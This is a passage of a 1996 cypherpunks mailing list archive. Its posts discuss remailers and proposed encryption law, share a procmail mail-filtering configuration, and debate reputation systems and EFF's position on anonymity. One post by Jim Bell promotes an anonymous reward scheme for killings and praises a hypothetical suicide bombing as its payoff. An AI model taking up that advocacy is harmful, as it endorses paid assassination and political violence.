>>sensible interpretation of Leahy's bill is that it criminalizes
>>strong remailers, that it is intended to punish ANYONE, not just
>>the criminals themselves, who obstructs investigations.
>
>As the recent discussion of knives, switchblades, and throwing stars
>showed, such ambiguous laws are often used to keep the coloreds down.

Perhaps the most ominous part of making "use of encryption to thwart an investigation" illegal is _not_ that remailer operators might be prosecuted, but that they might NOT be prosecuted in a deal where (in exchange for not being prosecuted) they continue to operate the remailer, "cracked" or sabotaged so that they share all the info with the cops. While even that won't make chained remailers totally useless, eventually suspicions of such a crack will surface, which will help sabotage the credibility of all remailers, not just the ones that have been "stung."

Jim Bell
jimbell at pacifier.com

From adam at homeport.org Wed Sep 4 19:40:05 1996
From: adam at homeport.org (Adam Shostack)
Date: Thu, 5 Sep 1996 10:40:05 +0800
Subject: How to use procmail
In-Reply-To: <9609042045.AA27973@sabel.idacom.hp.com>
Message-ID: <199609050006.TAA07462@homeport.org>

Martin Janzen wrote:
| New procmail users, listen to Adam! (And read the man page, even
| though it's a bit intimidating at first.)

Yeah, Listen to me! Listen to me! (It's the new cypherpunks theme song!)

More seriously, here's my .procmailrc. I'm fond of it, but the cpunks section could use some more work.
Other parts may be a useful basis for other people's hacking.

Adam

# $Id: .procmailrc,v 1.10 1996/08/05 04:54:46 adam Exp $
PATH=/bin:/usr/bin:/usr/local/bin:/usr/local/lib/mh
MAILDIR=$HOME/Mail/=	#you'd better make sure it exists
DEFAULT=/var/spool/mail/adam
LOGFILE=$MAILDIR/.procmail.log
REALLF=$LOGFILE		# So I only have one path to LF
COMSAT=no		# don't tell comsat; it's obsolete.
# VERBOSE=on		# bad bad bad!

#This first ruleset protects me from mailbombs from an automated service
#that I often send incorrect commands to, generating 5mb of reply.
# It also sorts based on success of the command.

:0c :
.safe

:0
* From bal@swissnet.ai.mit.edu
{
  :0 h
  * >10000
  /dev/null

  :0 h
  *^Subject:.*no keys match
  /dev/null

  :0:
  *Subject: Your command, ADD
  $DEFAULT

  :0E
  | pgp +batchmode -fka
}

# This is a backup. Don't forget to cycle safe boxes.
# this is here because I don't want to hear about everything going in .safe.

# prevent duplicate messages from showing up in several folders.
LOGABSTRACT=all	# doesn't work

:0 Wh: msgid.lock
| formail -D 65536 .msgid.cache

# auto key retrieval
#
# I have an elm alias, pgp, points to a keyserver
# The logfile gets unset briefly to keep the elm lines out of my
# logfile.

:0BW
* -----BEGIN PGP
*!^FROM_DAEMON
KEYID=|/home/adam/bin/sender_unknown

LOGFILE=
:0 ahc	# added h 8 jan 95
* ! ^X-Loop: Adams autokey retreival.
| formail -a"X-Loop: Adams akr" |elm -s"mget $KEYID" pgp
LOGFILE=$REALLF

:0
* (^TOCypherpunks|Sender:.*cypherpunks|^From owner-cypherpunks@toad.com)
{
  :0:
  * From.*owner-cp-lite@comsec.com
  cp-lite

  :0 h
  * Subject:.*(Delete|u*n*Sub*| add |leave|help|Undeliverable Message)
  * < 1000
  /dev/null

  :0 :rml.lock
  * ^From: Raph Levien
  * ^Subject: List of reliable remailers
  | cat /dev/null - > ~/sec/remailer-list

  :0:
  * 1^1 ^(From|To|Cc):.*david@sternlight.com
  * 1^1 ^Subject:.*CDA
  * 1^1 ^Subject:.*Assasination
  * 1^1 ^Subject:.*Reasons in support of crypto-anarchy
  * 1^1 ^Subject:.*Noise
  * 1^1 ^Subject:.*FV
  * 1^1 ^Subject:.*(PLEASE REPLY|test)
  cjunk

  :0B:
  * ^Alice de 'nonymous
  * an455120@anon.penet.fi
  * ^P.S. This post is in the public domain.
  | formail -a "Status: O" >> cjunk

  # I really ought to make this a weighted rule.
  :0:
  * ^From:.*(aba@atlas|adam@lighthouse|blancw|cdodhner|cfrye|chen|cman|cme|colin@|daw@cs|ddt|ebrandt|eric@remail|futplex|frissell|gnu|gtoal|habs|hallam|hfinney|hugh|jis|karn|loewenste|loki|mab|froomki|mpj|nate|nsb|perry|pfarrel|rah|rjc|rsalz|sameer|sandfort|schneier|ses|smb|stewarts|szabo|tcmay|trei|unicorn|usura@berserk|warlord|weidai|whitaker|Zimmerman)
  * !^From.*(anonymous|perry@jpunix.com|jonathan@Memexis|perry@psii.persci.com|gertstein|Schartman|don@cs.byu.edu|senate.gov|doug@eng)
  cpunks

  :0:
  cpunks-noise
}

:0:
* ^TOfirewalls
firewalls

:0:
*^From owner-fwtk-users@tis.com
fwtk

:0
*^TOcyberia-l
{
  # VERBOSE=on
  :0 HW
  FROM=|formail -x "From: "

  :0 f
  | formail -I"Reply-To: $FROM"

  :0 fw:cyberia.sed.lock
  * ^From: Timothy Arnold-Moore
  |sed 's/^ //g'

  :0:
  cyberia
}

:0:
* ^From procmail-request@informatik.rwth-aachen.de
procmail

# That's it for the high volume lists. Low volume lists I don't push
# through formail.

:0:
* ^TOyucks@cs.purdue.edu
* ^Subject: Yucks Digest
| formail +1 -ds cat >> yucks

:0:
* ^TObugtraq
bugtraq

:0
* ^TO .*(ietf|rfc-dist)
{
  :0h
  *^Subject:.*ON-SITE
  /dev/null

  :0:
  ietf
}

:0
* ^TOwww-buyinfo
{
  :0
  * ^From: rah@shipwright
  * ^Subject: .*(cpx)
  /dev/null

  :0:
  | formail -a "Status: O" >> wwwb
}

:0:
*^TOspki
spki

:0
*^TOssl-talk
{
  :0
  *^Subject:.*remove
  * < 2000
  /dev/null

  :0:
  ssl
}

:0:
*^TOwww-security@ns2.rutgers.edu
wwws

:0:
*^From owner-ssh
ssh

:0:
*^TOremailer-operators@c2.org
remailers

:0:
*From best-of-security
bos

:0:
* ^TObblisa
bblisa

:0:
*^TOcoderpunks
coderpunks

:0:
*^TOmix-l
mix-l

:0:
* ^TOphrack
v/phrack

:0:
*^TOsdadmin
sdadmin

:0:
* Precedence: (junk|bulk)
junk

:0:
* To: postmaster
postmaster

# basic file server. Only sends what's in .outbound
:0
* ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$
* !^Subject:.*[ /.]\.
* !^FROM_DAEMON
{
  # FILE=`formail -x Subject: | sed 's/.* //'`
  FILE=`sed -n -e '/Subject:/s/.* //p' -e '/^$/q'`

  :0c
  | (formail -rt -A"Precedence: junk";\
     cat $HOME/.outbound/$FILE) | $SENDMAIL -t

  :0:
  $MAILDIR/.log
}

# This handles vacation messages. Make sure .vacation.msg and
# .vacationlist exist

:0 hc:vaction.lock	# untested
* ? [ -r $MAILDIR/.vacationlist ]
* !? [ -r $MAILDIR/.vacation.msg ]
| rm -f $MAILDIR/.vacationlist

:0
* ? [ -s $MAILDIR/.vacation.msg ]
* !^Precedence:(junk|bulk)
* !^FROM_DAEMON
{
  FROM=`formail -rx To:`
  ALREADYSENT=$MAILDIR/.vacationlist

  :0 hc:
  * !? fgrep -e "$FROM" $ALREADYSENT
  | echo "$FROM" >> $ALREADYSENT;\
    (formail -rA"Precedence: junk";\
     cat $MAILDIR/.vacation.msg ;\
    ) | $SENDMAIL -t
}

--
"It is seldom that liberty of any kind is lost all at once."
	-Hume

From jimbell at pacifier.com Wed Sep 4 19:49:00 1996
From: jimbell at pacifier.com (jim bell)
Date: Thu, 5 Sep 1996 10:49:00 +0800
Subject: Browne and foreign tyrants
Message-ID: <199609042343.QAA25061@mail.pacifier.com>

>From: "George D.
Phillies"
>Subject: Re: Browne & foreign tyrants
>There is a section of the Geneva Protocols forbidding actions in occupied
>territories directed against officers of political parties. Under that
>section, the actions in Somalia against, e.g., the treasurer of General
>Aidid's political party, were war crimes. No one seems to get very upset.
>
>> If there is such a treaty, the US has a long history of ignoring it.
>>
>> 0) Attempts to kill Hitler.
>I don't think we ever tried this.

And this was a real shame. Over 30 million people died in WWII, directly or indirectly. We knew that Hitler was going to be a problem well before 1936. Think how many could have been saved... If anything, WWII is excellent proof that AP is a good idea.

Stauffenberg was the German who bombed Hitler's meeting in 1944 but failed to kill him. Stauffenberg knew as early as 1942 that Hitler needed to be killed, and a recent "60 Minutes" episode related how hundreds of people knew about this plot. The reason he failed was that while he was preparing the two bombs in a bathroom, he was interrupted. (The bomb's delay mechanism was acid dissolving a metal.) Rather than being caught, he left one of the briefcases in the bathroom and went to the meeting with only one bomb. Furthermore, he left the bomb at the meeting, but it was pushed behind the heavy table after he left, which shielded Hitler from much of the force of the explosion.

If AP (or at least, some anonymous reward mechanism for Stauffenberg's family) had been available, he would have done "the honorable thing," and walked up to Hitler with the bomb and instantly detonated it right there, resulting in both Hitler's and Stauffenberg's certain death. At least hundreds of thousands or perhaps over a million people would have SURVIVED. As it happened, Stauffenberg's reticence caused not only his death after torture, but also the deaths of well over a hundred coup-plotters, but also the thousands that were yet to die in the last 6+ months of WWII.

Question: Would you kill yourself to save a million lives? Even if you wouldn't, would you change your mind if your heirs would be anonymously paid an extra $10 million dollars or so? I'd say that's a pretty substantial motivation, wouldn't you?

Jim Bell
jimbell at pacifier.com

From surya at premenos.com Wed Sep 4 20:34:30 1996
From: surya at premenos.com (Surya Koneru)
Date: Thu, 5 Sep 1996 11:34:30 +0800
Subject: rc2 export limits..
Message-ID:

RC2 uses an effective key size, so is it ok to use a key of 128 bits size with a 40 bits effective key size for export.

Thanx
--Surya

>----------
>From: Simon Spero[SMTP:ses at tipper.oit.unc.edu]
>Sent: Tuesday, September 03, 1996 8:33 PM
>To: Surya Koneru
>Cc: 'cypherpunks at toad.com'
>Subject: Re: rc2 export limits..
>
>It's the usual - if you want commercial jurisdiction,
> 40 bits unescrowed
> 64 bits (16 escrowed)
>
>Above that, you'll have to go through state on a per customer basis
>(which I don't think is that easy to get if software is being shipped
>outside the US, and is definitely going to be expensive.)
>
>Simon
>
>
>---
>Cause maybe (maybe) | In my mind I'm going to Carolina
>you're gonna be the one that saves me | - back in Chapel Hill May 16th.
>And after all | Email address remains unchanged
>You're my firewall - | ........First in Usenet.........
>

From cjs at cinenet.net Wed Sep 4 20:49:42 1996
From: cjs at cinenet.net (Chris Steinke)
Date: Thu, 5 Sep 1996 11:49:42 +0800
Subject: cypherpunks
Message-ID: <322E4DFA.167E@cinenet.net>

subscribe cypherpunks

From azur at netcom.com Wed Sep 4 21:15:57 1996
From: azur at netcom.com (Steve Schear)
Date: Thu, 5 Sep 1996 12:15:57 +0800
Subject: Secure remailers, was Race Bit: C
Message-ID:

>At 04 Sep 1996 15:21:54 -0800, jim bell wrote:
>Perhaps the most ominous part of making "use of encryption to thwart an
>investigation" illegal is _not_ that remailer operators might be prosecuted,
>but that they might NOT be prosecuted in a deal where (in exchange for not
>being prosecuted) they continue to operate the remailer, "cracked" or
>sabotaged so that they share all the info with the cops. While even that
>won't make chained remailers totally useless, eventually suspicions of such
>a crack will surface, which will help sabotage the credibility of all
>remailers,
>not just the ones that have been "stung."
>

Yes, that is why there needs to be a move to place all 'critical' portions of remailers and other important servers inside trusted hardware which is highly resistant to compromise. All access to sensitive information (e.g., keys) inside these modules should require multiple parties in several countries (not just the operator of the server) to cooperate. Properly structured, such controls could effectively thwart law enforcement compromise.

PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear, N7ZEZ | Internet: azur at netcom.com
Grinder | Voice: 1-702-655-2877
Sacred Cow Meat Co. | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129 |
---------------------------------------------------------------------

From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 4 21:28:50 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Thu, 5 Sep 1996 12:28:50 +0800
Subject: Paladin Publishing suit dismissed
Message-ID: <01I93G9JPMBK9JDJT7@mbcl.rutgers.edu>

Thank you; my memory isn't the best in the world (obviously).

-Allen

From jf_avon at citenet.net Wed Sep 4 21:30:15 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Thu, 5 Sep 1996 12:30:15 +0800
Subject: Letter to the Observer [re: Internet paedophile]
Message-ID: <9609042255.AA24605@cti02.citenet.net>

On 4 Sep 96 at 14:44, Declan McCullagh wrote:

> Jean-Francois, your comments are inspired!
>
> As a member of "such media" in that I still publish articles on dead
> trees -- I have articles in fall issues of Wired and Playboy, for
> instance -- I rejoice in your reasoned suggestion that you deny me
> and my ilk access to the Net.
>
> But wait! I connect through wired.com, eff.org, or *.edu accounts.
> How do you plan to kick me off my "ISPs?"
>
> No, you're not out to lunch.

Well, I did not expect nor want to bar all of the ink spreader community, only, by giving some individual or some rags some trouble, they might get the message.

*I* don't plan to kick any net-smearer scumbag off his ISP, I suggest/-ask if- ISP themselves would have advantage to do that./?

I simply don't pretend to know it all, so I ask questions...

jfa

Jean-Francois Avon
DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
JFA Technologies, R&D consultants: physicists, technologists and engineers.

PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

From gregburk at netcom.com Wed Sep 4 21:34:19 1996
From: gregburk at netcom.com (Greg Burk)
Date: Thu, 5 Sep 1996 12:34:19 +0800
Subject: Reputations
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

tcmay at got.net (Timothy C. May) writes:
> Briefly, think of "restaurants" when thinking about reputations. If one
> arrives in a new city, most restaurants may have the same baseline
> reputation, e.g. "none." A few may be known by name, for their
> "reputation," either good ("You have to eat at Louie's--the laser chicken
> is incredible") or bad ("Blecch!). Positive reputations and negative
> reputations are self-explanatory. And the reputations of others may affect
> the reputations of restaurants ("John Gilmore says he likes the Burma
> Burger on Castro Street."). Bad recommendations may affect the "reputation
> capital" of John, for example. (We speak of "reputation capital" because it
> can in some sense be "spent.")

That part of the "reputation capital" theory has always seemed suspicious to me. "reputation capital" doesn't behave linearly. There's too much incentive to bottom-feed and too little incentive to shoot for the heights. As an "asset", it is extremely non-liquid. It is hard to spend it in a controlled manner.

Too much incentive to bottom-feed: For example, let's say there's someone well-known who frequently speaks nonsense on crypto issues. We'll call her "Norothy Nenning". She makes a recommendation on some particular crypto issue, say "The government's Nipper chip is a safe and effective form of crupto". Plenty of naive people will credit her to some degree. True, fewer people than if she had carefully husbanded her reputation, and to a lesser degree, but still a lot more than zero.

Notice that that's a zero cost/benefit ratio. She never does anything to husband her reputation, she just spends it every chance she gets. And while no single expenditure rewards her as much as it would if she made the same expenditure with a good reputation, she spends so much more freely that it is a good strategy for her on the whole.

"Reputation capital" is hard to spend down to absolute 0 because it is significant work to distinguish valid "reputation capital" from worthless counterfeit, and it is easy to counterfeit... just talk.

I anticipate the answer "Well, the work pays off". But that misses the point. Frequently the work required to tell the good "reputation capital" from the worthless is as much as would be required to find the straight dope yourself.

Too little incentive to shoot for the heights: Suppose you judge that you've accumulated twice as much "reputation capital" as Joe. How do you get twice as much payoff? It seems to me that above the threshhold of credibility, minor side issues make more difference than your two-fold "reputation capital" differential.

As an "asset", it is extremely non-liquid: How exactly would you "convert" your reputation into other capital? Would you accept bribes and tell lies? Seems to me you would only get a one-shot "conversion" and it couldn't possibly hope to equal your investment. As soon as you leave the information-broker business, you discover that your "asset" cannot be converted, sold, auctioned off, or much of anything else of value to you.

It is hard to spend it in a controlled manner: See above. The single bribe-and-lie will spend your "reputation capital" down to below the threshhold of credibility, no matter how much you started with.

Human discourse often tends to be absolutist. It is often very difficult to make people understand and retain a message of partial support or qualified support. Particularly on hot issues. Restaurants, sure, you can give 1 to 5 stars, but in many subject areas there is no such system. And any system you yourself invent tends to be ignored.

So I think the latter part of the analysis is wishful thinking, or at least restricted to a small subset of subject-matter.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQBVAwUBMi4omrMyVAabpHidAQGGPAIAizIOktCC4B5gtVYPblaTi9FL6ZtwTfkP
sAFHT626mMLz1f/ZKa2SLq3pdag09ACCklJLJ1djFwSFP4bvoijMfw==
=rFti
-----END PGP SIGNATURE-----

From mech at eff.org Wed Sep 4 21:37:46 1996
From: mech at eff.org (Stanton McCandlish)
Date: Thu, 5 Sep 1996 12:37:46 +0800
Subject: What is the EFF doing exactly?
In-Reply-To: <199609042000.VAA00708@server.test.net>
Message-ID: <199609042341.QAA14459@eff.org>

Adam Back typed:
>
>
> Stanton McCandlish writes on cpunks:
> > [again, since I'm not on the CP list these days, feel free to bounce this
> > over to the list if it doesn't make it. I'm not sure what the
> > non-subscriber posting policy is and/or whether such attempted posts are
> > filtered out, though I seem to recall they didn't used to be.]
>
> Cypherpunks always has been and remains an open list. You shouldn't
> need to wonder given cypherpunk views on free speech :-)

I grok. Hadn't been on the list for a while, and a lot of lists have set up non-subscriber filters to block spam these days. I apologize to CP readers, who rightfully question my Ccing the list when I'm not on it (lately, anyway). I'm just responding to where the message I'm responding to has been. So far no one's seemed particularly upset at this, just irritated, so it seems prudent to continue doing so, unless/until this gets to be a pointless thread.

> > In other words you propose an alternate EFF that censors its own
> > boardmembers.
>
> No. But I too am rather surprised to hear an EFF board member
> apparently speaking against free speech. OK, so maybe she was
> mis-quoted so I wait for her rebuttal, but nope, she basically to my
> reading reiterates nothing but negative opinions on free speech and
> anonymity.
>
> Tim's quotes of her CFP speech further demonstrates her leanings.

I've talked to her personally about this. She's not thinking along those lines, she just perceives a potential problem in the accountability/ethics area, and is wondering how that can be solved, if it can be solved, and what the price of such a solution is. Honest, she's not *advocating* restrictions on anonymity, just asking if any are necessary, in whose opinion, with what rationale, at what cost, and by what mechanism.
Another CP reader I've been talking to suggests even asking such a question is dangerous because it puts ideas in the minds of anti-freedom legislators. I tend to disagree on this, since such people already see anonymity as a problem. They come from a world in which every citizen minus a few "weirdos" has an ID card, whose check and credit transactions are traceable, whose money is marked and numbered, whose medical and other records are readily available. And their campaigns are funded by companies with a vested interest in identification (credit bureaus, banks, insurance companies, etc.) They *already have* the idea. But, that may be neither here nor there.

I would agree when it comes to things that legislators have not even thought about yet. In cases like that, better to work quietly with activists, with industry, etc., to deal with it behind the scenes so it never even appears on congressional or regulatory radars.

> Let's put it this way: if Louis Freeh offered to be an EFF board
> member, would you take him on board? If he seemed quite

Highly unlikely. Who gets to be a boardmember is decided by a board vote. Freeh's anti-freedom history, and his obnoxious nature would, in my guesstimate, give him less than a .0000000000001% chance of ever making it onto the EFF board. And that's being nice. :)

Dyson has no such history, and does have a history of careful thought (even if disagreed with by quite a few people) about networks, online commerce, negative effects of regulation, and civil liberties issues. More the former 3 than the latter 1. Not everyone on the board is there because of strong work directly in liberty areas, but often for other stuff, as long as they seem consistent with the civil liberties issues. Otherwise we might as well just have one boardmember. The diversity is necessary, as long as it doesn't get divisive.
It has gotten divisive in the past, and there are some boardmembers who are not on the board any more as a result (none that I know of were "canned", they just understood it wasn't working and moved on.)

> pro-anonymity, and free speech, and later turned out to be having
> doubts, would you keep him?

I'll generalize that to "if you had any boardmember who expressed doubts about the value of free speech and privacy, would the board keep them?" I think not. But Esther's taken no such position. She's asking questions about the mechanics of a system, and the effects of the system on society. These are valid questions. It'd be helpful to see some short Cypherpunks-generated answers, if they are available. Stuff about reputational systems, etc. I know this stuff in a vague way from reading CP for years, but I don't have or know of any specific documents on the topic. Something like that to pass around internally here would be of value in helping EFF settle remaining issues, adopt a policy position, and get on with it.

> Ie if her views are proving a liability for EFF's reputation, perhaps
> you all ought to get together and see if you can work something out?

That is unlikely to ever be a concern. If any boardmember's views proved a liability for EFF mission and work toward that mission, that's when the board would consider asking for a resignation, or kicking someone off the board directly. We're mindful of PR and image, but the mission comes first.

> Anonymity is a pretty darn major issue here, so it'd be really sad to
> see EFF coming down on the wrong side. I've seen some of the other

That will never happen. EFF would tear itself apart in a matter of hours if that happened. The worst that will happen is that EFF won't adopt a policy on this issue. I tend to doubt that will happen either. As I was telling BU, I think we're closer now than ever before to having an anonymity policy. That's mainly why I'm asking for pointers to any superb documentation on the topic.
It's genuinely needed to resolve a few remaining issues.

Just to be clear: There is no disagreement on the board, or the staff, of EFF that anonymity is a vital component of privacy. If that's what the worry is, lay it to rest! Actually coming up with a statement on the issue is something that's taking a bit longer due to some concerns and questions that haven't been assessed yet (by the boardmembers with these questions & concerns).

> She sounded pretty anti-anonymity to me.

I think that's your inference, not her implication. :) I've talked to her personally about this, and that's not what she's saying.

> Are there a shortage of political and net-aware libertarians for board
> candidates or something?

There's no shortage of candidates in general, but finding ones that add something useful to the mix, get along with everyone, work cooperatively, are not interested in being a board member to add a line to their vitae or for other purely personal reasons, who have enough time and resources to do this, are willing to do fundraising, etc., etc., is somewhat more difficult.

(I answer the question since it was asked. I refute, from a personal level, the implication that Esther's not fit to be on the EFF board. She's been here almost from the very start, and EFF would not be here right now at all if not for her.)

> Perhaps the quote was unfortunate, perhaps she has also said
> pro-anonymity things. But a person who is pro-anonymity would surely
> try to emphasise the pro arguments also? The material I have seen so
> far does not seem to indicate that this is the case.

This long after the fact I have no way of knowing what she said verbatim, in what order, with what stress, etc. Having been interviewed a lot of times, and seen a mangled result, I know that interviewers often take liberties with the ordering of statements, and remove material, and juxtapose one statement with other stuff it was not referring to originally, etc. Any of that could have happened.
If it was an oral interview, which is likely, keep in mind that many people don't speak well off the tops of their heads. I can't believe some of the things *I*'ve said in situations like this. They just didn't come out right. Interviewers often get attribution incorrect too, as in this case.

I think this is a mountain out of a mole hill problem. Like I say, if EFF comes out with a policy against anonymity, THEN get out the rope. It just won't happen.

> If this is the case she needs to be _much_ more careful about what she
> says in `personal' interviews.

Certainly. All of us do. I know I do. I still remember the time I slammed the FCC for being "the largest censorship body in the western world", at a time during which EFF was trying to get them to back off from deciding to push for regulatory authority (which, as we've seen, Congress is only too willing to grant). Needless to say, they would have been less willing to listen to EFF after that, had they seen the comment (probably didn't, it was in a small local newspaper; had a lot of dangerous potential though.)

> Be sure to express the pro-anonymity arguments while you're zealously
> hammering out every last thing that can go wrong with anonymity: like
> that free speech is not possible with out it. It's pretty much all or
> nothing, either you think free speech is worth the risk, or you prefer
> big brother, government access to keys, the works.

Agreed. I'm sure the board agrees too. We just like, and need, to have answers to the immediate authoritarian attack that will come on what EFF says, before we say it. The saying about being silent and being thought a fool, vs. speaking up and removing all doubt applies here in an interesting way. If we have unprepared arguments, opponents will make us look like fools. It's only a secondary concern that this hurts EFF's image. The real problem is that things like that undermine the credibility of the whole "cyberliberty" camp.
> [see http://www.c2.org/~winsock/ for a windows remailer]

Any e.t.a. on a Mac one? Sometimes I wish I could write code worth an exon so I could help move this along. Like I have any time to do programming anyway...

--
Stanton McCandlish
mech at eff.org
Electronic Frontier Foundation
Online Activist

From declan at eff.org Wed Sep 4 21:38:30 1996
From: declan at eff.org (Declan McCullagh)
Date: Thu, 5 Sep 1996 12:38:30 +0800
Subject: What is the EFF doing exactly?
In-Reply-To: <199609041702.KAA15781@mail.pacifier.com>
Message-ID:

On Wed, 4 Sep 1996, jim bell wrote:

> Why WOULDN'T the police want to shut down anonymous remailers? The Leahy
> bill clearly didn't distinguish between remailer operators and users, so it
> is no leap to conclude that they would be treated similarly.

Why *wouldn't* the police want to shut 'em down? Because the police respect the Constitution and our civil liberties, of course, and realize and respect the value of anonymous political speech.

-Declan

// declan at eff.org // I do not represent the EFF // declan at well.com //

From unicorn at schloss.li Wed Sep 4 21:41:18 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Thu, 5 Sep 1996 12:41:18 +0800
Subject: What is the EFF doing exactly?
In-Reply-To: <199609041827.LAA29523@netcom20.netcom.com>
Message-ID:

On Wed, 4 Sep 1996, Vladimir Z. Nuri wrote:

>
> jim bell
> >"Addressed", maybe, but that doesn't necessarily mean, "solved." For many
> >decades, people have been able to walk up to a pay telephone at 3:00 AM and
> >make a harassing phone call to somebody, a "problem" which still exists and
> >no solution is being implemented for.

Incidentally, this is being "solved." In D.C. and Chicago the solution is to rip up the payphones and not permit new ones to be installed. If anyone objects the officials responsible make a wide gesture and say "We didn't take away your phones, CRIMINALS took away your phones."

> amusing the way you phrase that-- you didn't say, "phone", but "pay
> phone". the statement used to hold in general for all "phones", but
> then caller id, caller blocking, etc. have been introduced that
> make this no longer true.
> so in a very real sense, anonymity in
> the phone system was considered a "problem" by some that has been
> "solved" or "modified" by some recent advancements. (yes, most people
> agree caller ID is an advancement).
>

Yet today one can go out and rent a cell phone on the street, or even pay for one's activation in cash up front without presenting any real identity documents.

The real question is this, what are you going to do to annihilate anonymous communication, because if you think it's harmful that's what you have to do.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 4 21:52:19 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Thu, 5 Sep 1996 12:52:19 +0800
Subject: Internet Tax in Tacoma cancelled
Message-ID: <01I93H4Y6YHW9JDJT7@mbcl.rutgers.edu>

An excellent case of considering regulatory arbitrage effects.
-Allen

> _________________________________________________________________
> webslingerZ
> _________________________________________________________________
> TACOMA, WASH. CITY COUNCIL REPEALS TAX ON INTERNET PROVIDERS
> __________________________________________________________________________
> Copyright © 1996 Nando.net
> Copyright © 1996 Reuter Information Service
> TACOMA, Wash. (Sep 4, 1996 01:17 a.m. EDT) - Tacoma City Council
> members voted Tuesday to exempt Internet service providers from a 6
> percent telecommunications tax that had attracted nationwide
> attention.
> With only one dissenting vote, the council approved the exemption at
> the urging of Mayor Brian Ebersole, who said Tacoma's reputation as a
> good place to do business outweighed the estimated $200,000 in annual
> revenue the city stands to lose.
> The tax had been imposed on Internet companies in March by Tacoma's
> tax and license department as part of a broader levy that affects
> users of cellular telephones, pagers and other equipment who get
> billed at addresses within the city, about 30 miles south of Seattle.
[...]
> Tacoma is one of many cities and states who have seized on the rapid
> growth of the Internet as a potential for raising needed tax revenues.
> West Virginia, Tennessee, Texas, New York and Ohio have similar taxes
> in place, and California, Florida, New York and Washington state are
> considering them.
[...]
> Copyright © 1996 Nando.net

From sunder at brainlink.com Wed Sep 4 21:52:35 1996
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 5 Sep 1996 12:52:35 +0800
Subject: Cypherpunks Lite Info Here.
In-Reply-To: <2.2.32.19960828225105.006ccc74@pop.ben2.ucla.edu>
Message-ID:

On Wed, 28 Aug 1996 youssefy at ucla.edu wrote:

> There was a posting by someone about three weeks ago that gave the address
> for a person who ran a filtered version of the cypherpunks list, can someone
> please repost that information?

Very well, I will be lazy, and post the info out of my help file. Enjoy. :)

Help is here!

Hi there, as requested, here's some info about the filtered cypherpunks list which I run (by hand with the help of a couple of mailbots)

This list is NOW running from: sunder at brainlink.com.

Basically, I use the 'bots to keep the list of recipients, then forward any message to this list of usernames which I find interesting, and usually noise-free...

Since, I do this by hand, AND since there is no majordomo mailing list software, and since I get a lot of mail, it's a good idea to make sure the subject of any messages you send to me stand out. i.e. make the subject line:

"***000 Personal junk mail for the human, not the bots ***"

(The 0's are there to make sure that when Pine sorts the messages on this side, they come up on top, making sure I'll see them immediately.)
There is no automated filtering of any sort... Whatever message I find to be interesting, news-worthy, or technical (theoretical crypto, actual code, etc) gets handed over to the bots, which send it to this list.

If you use some sort of filtering program to move messages to a folder, look for the string "FCPUNX:" (without quotes) in the subject field.

There will usually be a propagation delay of one day to a week days - sometimes as long as two weeks between the messages on the actual cypherpunks list, and this filtered one. This is because I may not always get the chance to log in every day, and also because I may have to wade through tons of noise/spam/flames from the real list. :-)

Occasionally, if I see something interesting from another list (such as Cyber Rights, coderpunks, etc) I will forward it here if I feel that it pertains to Cypherpunk interests, or that you'd like to see it.

You should unsubscribe yourself from the real list by sending an "unsubscribe cypherpunks" message to majordomo at toad.com - that is send a message with no subject and just that single line - no signature either, so as to unsubscribe. - Unless you wish to continue to receive messages from the real list as well as copies of those messages from here. :-)

All filtering is again according to my whims so if you dislike what I send you, sorry. I might eventually work something out where this list will be broken up into many tiny lists so you'd subscribe to whatever subjects you're interested in.

This is a free service, no strings attached, just tons o'mail, but less mail than the unfiltered list... Also note that the bots I run may sometimes be slightly buggy and may do unexpected weird things. Apologies in advance if this happens. But please by all means do report any such runaway bot occurrences.
If you wish to unsubscribe yourself from this list, just send a message with the subject "unsubscribe fcpunx" (no quotes) and the next time I log in, one of the bots will handle the unsubscribe.

You can re-subscribe yourself as many times as you like, you'll only get one copy of each message, but as many copies of the request response as you've sent. The 'bots hone in on your address and send mail only there, so subscribe yourself from whatever account you want to receive mail. If by accident you subscribe from two different machines, the bots won't know the difference and you'll get two copies of each filtered message, so be careful. This also means that you can only unsubscribe yourself from the same address you subscribed from.

To get help, send a message with the subject "help fcpunx."

To subscribe yourself (if you see this, you are subscribed) send a message with the *SUBJECT* "subscribe fcpunx"

NOTE: THE BOTS ONLY RESPOND TO THE SUBJECT LINE, NOT TO TEXT IN THE BODY OF YOUR MESSAGE!

The bots only look at your message's subject and your mailing address so it doesn't matter what you put in the body. Whenever the 'bots honor a request from you, you'll see a response mailed from them (under my name.) Since the bots are only active when I log in and run them by hand, the message acknowledging your request may take several days to get to you.

*ALL COMMANDS MUST BE SENT IN THE SUBJECT OF THE MESSAGE! The body (text) of the message is ignored.
Commands available:

subscribe fcpunx           - subscribes you to the list and you are visible to fcpunx who requests
subscribe invisible fcpunx - subscribe but don't let others know
digest fcpunx              - receive the digest version (visibly)
digest invisible fcpunx    - receive the digest invisibly
unsubscribe fcpunx         - unsubscribe from the list or digest
undigest fcpunx
who fcpunx                 - receive a list of (visible) subscribed users
help fcpunx                - sends a help file (you're looking at it)

If you're already subscribed to the list and want to switch to the digest version, you can do this by sending a digest fcpunx message; the reverse is also true. Notice that you cannot subscribe to both the digest and the list. Sorry. If you'd like that feature either use two different accounts to receive them, or complain to me and I'll add it in.

The unsubscribe and undigest commands do the same thing, they take you off the list no matter which version you're subscribed to.

=============================================================================
 + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\==
  \|/  |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
